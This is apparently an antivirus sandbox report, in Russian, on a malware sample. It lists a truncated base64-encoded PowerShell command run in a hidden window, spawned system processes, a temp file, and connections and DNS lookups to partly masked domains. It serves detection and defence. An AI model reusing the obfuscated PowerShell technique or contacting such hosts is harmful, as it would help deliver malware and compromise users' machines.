Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD UwBFAFQALQBpAHQARQBNACAAdgBhAHIAaQBBAGIAbABFADoAOQByAEoAbwAgACgAWwBUAHkAcABFAF0AKAAiAHsANQB9AHsAMAB9AHsANAB9AHsAMwB9AHsAMgB9AHsAMQB9ACIALQBmACAAJwBpAE8AJwAsACcAYwB0AG8Acg...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1528
- %TEMP%\1163393.cvr
- 'yo####ivatelife.com':80
- 'as##q.xyz':443
- 'as##q.xyz':443
- 'dm###inlaw.com':443
- 'tv#####internetdeal.com':443
- DNS ASK yo####ivatelife.com
- DNS ASK fi###ttrade.com
- DNS ASK as##q.xyz
- DNS ASK ar######tahighschool.com
- DNS ASK an#####ndfriends.com
- DNS ASK dm###inlaw.com
- DNS ASK tv#####internetdeal.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD UwBFAFQALQBpAHQARQBNACAAdgBhAHIAaQBBAGIAbABFADoAOQByAEoAbwAgACgAWwBUAHkAcABFAF0AKAAiAHsANQB9AHsAMAB9AHsANAB9AHsAMwB9AHsAMgB9AHsAMQB9ACIALQBmACAAJwBpAE8AJwAsACcAYwB0AG8Acg...' (со скрытым окном)
- '<SYSTEM32>\werfault.exe' -u -p 236 -s 1516' (со скрытым окном)